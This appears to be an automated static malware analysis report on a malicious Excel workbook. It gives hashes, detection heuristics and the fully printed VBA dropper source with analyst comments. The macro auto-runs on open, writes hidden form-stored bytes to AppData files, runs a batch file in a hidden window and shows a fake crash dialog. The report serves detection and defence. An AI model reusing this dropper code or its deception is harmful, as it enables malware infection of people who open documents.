Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f0c85a1c9cf80ad4…

MALICIOUS

Office (OLE)

Size: 794.5 KB · Created: 2018-08-28 10:39:29 · Authoring application: Microsoft Excel · First seen: 2022-07-02
MD5: a6270064f1630cdf5bcda858762db516
SHA-1: 514862e015a43b914971ad9ece05a3ea0939c6fd
SHA-256: f0c85a1c9cf80ad424acebbe7af54176d0cb778a639da2f2f59828af5bb79842
Risk score: 196

Heuristics: 6 findings

  • ClamAV: Doc.Dropper.Agent-6892861-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6892861-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    A call to the VBA Shell function was found in the macro source; the matched line below passes vbHide, so the launched program runs without a visible window.
    Matched line in script
        Call Shell(strProgramName, vbHide)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags macro documents that are p-code-only or whose source extraction failed, i.e. where the VBA source is not available for inspection. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    The document defines a Workbook_Open event handler, which Excel runs automatically when the workbook is opened with macros enabled.
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    The macro calls Environ$() to read an environment variable (USERPROFILE in the matched line) and uses it to build a file path.
    Matched line in script
        path_file = Environ$("USERPROFILE") & Split("\AppData\!juchek", "!")(0) + Split("juchek!" & path_dom, "!")(1) + Split("juchek!.ttp", "!")(1)

Extracted artifacts: 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3397 bytes
SHA-256: 75023a5832f9c439b782b43bb4f97d1d5c318ce488927e6353bb74c99070b174
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Standard module "Module1": holds the three routines that make up the dropper
' chain below (WaitFo -> delay, userLoadr -> write files, userexecute -> Shell).
' WaitFo: busy-wait delay of roughly NumOfSeconds seconds, spinning on Timer and
' yielding with DoEvents. userLoadr calls it with 1 after each file it writes.
' NOTE(review): short timing pauses of this kind are also a common sandbox/
' emulator evasion trick - intent inferred, not provable from this listing.
' The two path_dom assignments are dead stores (the local is never read); they
' only pad the routine, presumably to vary its bytes/hash - inferred.
Sub WaitFo(NumOfSeconds As Long)
    Dim SngSec As Long
    Dim path_dom As String
    path_dom = "F1DF22D4B52R2dD2C1"   ' dead store: never read
    SngSec = Timer + NumOfSeconds      ' Timer = seconds since midnight; rounded into a Long, so the delay is approximate
    Do While Timer < SngSec            ' spin until the deadline, keeping the host responsive via DoEvents
        DoEvents
    Loop
    path_dom = "E1F122WF42B213D1C"     ' dead store: never read
End Sub

' userLoadr: the dropper. Builds two file paths under %USERPROFILE%\AppData\,
' fills each file with bytes taken from a text box on a hidden form, then hands
' the second path to userexecute (Shell with vbHide).
'   1. %USERPROFILE%\AppData\juchek.ttp  <- bytes from UserForm.TextBox1.Text
'   2. %USERPROFILE%\AppData\bat.bat     <- bytes from UserForm1.TextBox1.Text
' Each Split("...", "!")(n) expression is string-splitting obfuscation that
' yields a fixed fragment ("\AppData\", "juchek"/"bat", ".ttp"/".bat"); the
' concatenations are plain path building, nothing is computed.
' The payload bytes are NOT in this VBA source: they are the stored text of the
' two TextBox1 controls (confirm by extracting the form control data).
' Only bat.bat is executed here; the .ttp file is written but never referenced
' again in this listing - presumably consumed by the batch file (inferred).
' Detection points visible from this code: the Excel host creating the two
' paths above, followed by a hidden child process launched from Excel.
Sub userLoadr()
    Dim row As Long
    Dim path_file As String
    Dim path_dom As String
    path_dom = "juchek"
    ' Resolves to Environ$("USERPROFILE") & "\AppData\" & "juchek" & ".ttp"
    path_file = Environ$("USERPROFILE") & Split("\AppData\!juchek", "!")(0) + Split("juchek!" & path_dom, "!")(1) + Split("juchek!.ttp", "!")(1)
    Dim ar() As String
    If Len(Dir(path_file)) = 0 Then      ' drop only if the file does not already exist (first run)
        ar = Split(UserForm.TextBox1.Text, ",")   ' comma-separated list of decimal byte values
        Open path_file For Binary As #1  ' Binary mode creates the file when it is missing
        Seek #1, LOF(1) + 1              ' move to end of file (LOF is 0 for a fresh file)
        For row = LBound(ar) To UBound(ar)
            Put #1, , CByte(ar(row))     ' one byte per token; CByte raises a runtime error for non-numeric or out-of-range (>255) tokens
          
      Next
        Close #1
        Call WaitFo(1)                   ' ~1 s pause after the write
        End If
        
    path_dom = "bat"
    ' Resolves to Environ$("USERPROFILE") & "\AppData\" & "bat" & ".bat"
    path_file = Environ$("USERPROFILE") & Split("\AppData\!bat", "!")(0) + Split("bat!" & path_dom, "!")(1) + Split("bat!.bat", "!")(1)
    Dim ara() As String
    If Len(Dir(path_file)) = 0 Then      ' same existence check for the batch file
        ara = Split(UserForm1.TextBox1.Text, ",")  ' second payload, same comma-separated byte encoding
        Open path_file For Binary As #1
        Seek #1, LOF(1) + 1
        For row = LBound(ara) To UBound(ara)
            Put #1, , CByte(ara(row))
          
      Next
        Close #1
        Call WaitFo(1)
    End If
    userexecute path_file                ' path_file now holds the .bat path; executed regardless of whether it was just written
End Sub


' userexecute: launches strProgramName with the VBA Shell function. vbHide runs
' the program with no visible window. userLoadr passes the dropped .bat path
' here, so the Office host process is the parent of the spawned command - the
' Office-spawns-shell parent/child relationship is the detection point.
Sub userexecute(strProgramName As String)
    Call Shell(strProgramName, vbHide)   ' hidden window; return value (process id) is discarded
End Sub




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ThisWorkbook document module (VB_Base GUID 00020819-... is the Excel Workbook
' class). Its Workbook_Open handler below is the auto-execution entry point that
' starts the dropper chain. No Option Explicit is present in this module.
' Workbook_Open: runs automatically when the workbook is opened with macros
' enabled. Order matters: the payload is dropped and executed first, then a
' fake "stopped working" dialog is shown so the user believes Excel crashed.
Private Sub Workbook_Open()
    Call userLoadr                       ' drop the two files and Shell the .bat (hidden)
    Sheet2.Copy                          ' Worksheet.Copy with no destination creates a new workbook holding Sheet2 (role unclear - possibly a decoy; inferred)
    a = MsgBox("Microsoft Excel has stopped working", vbCritical, "Microsoft Excel")   ' decoy error dialog; 'a' is never declared, so the module is not under Option Explicit
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1 document module (VB_Base GUID 00020820-... is the Excel Worksheet
' class): contains no code.

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet2 document module: contains no code. It is the sheet that Workbook_Open
' copies via Sheet2.Copy; its cell contents are not part of this listing.

Attribute VB_Name = "UserForm"
Attribute VB_Base = "0{17C01D7F-52FF-4A39-B685-4669A7549A70}{E1761CE6-0607-427E-B23A-1752645D7BE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' UserForm: never shown. Its TextBox1 control is the storage for the first
' payload (userLoadr reads UserForm.TextBox1.Text as a comma-separated byte
' list and writes it to juchek.ttp). The stored text is not in this VBA source.
' TextBox1_Change: empty event handler (auto-generated stub). The control is
' only ever read by userLoadr; nothing reacts to changes.
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9A378476-F31A-4EA5-92B7-9C5A1B52D65B}{C35F3BB4-0ABF-43DC-A520-0D31BBFA44C3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' UserForm1: never shown. Its TextBox1 control is the storage for the second
' payload (userLoadr reads UserForm1.TextBox1.Text and writes it to bat.bat,
' which is then executed). The stored text is not in this VBA source.

' TextBox1_Change: empty event handler (auto-generated stub); the control is
' only read by userLoadr.
Private Sub TextBox1_Change()

End Sub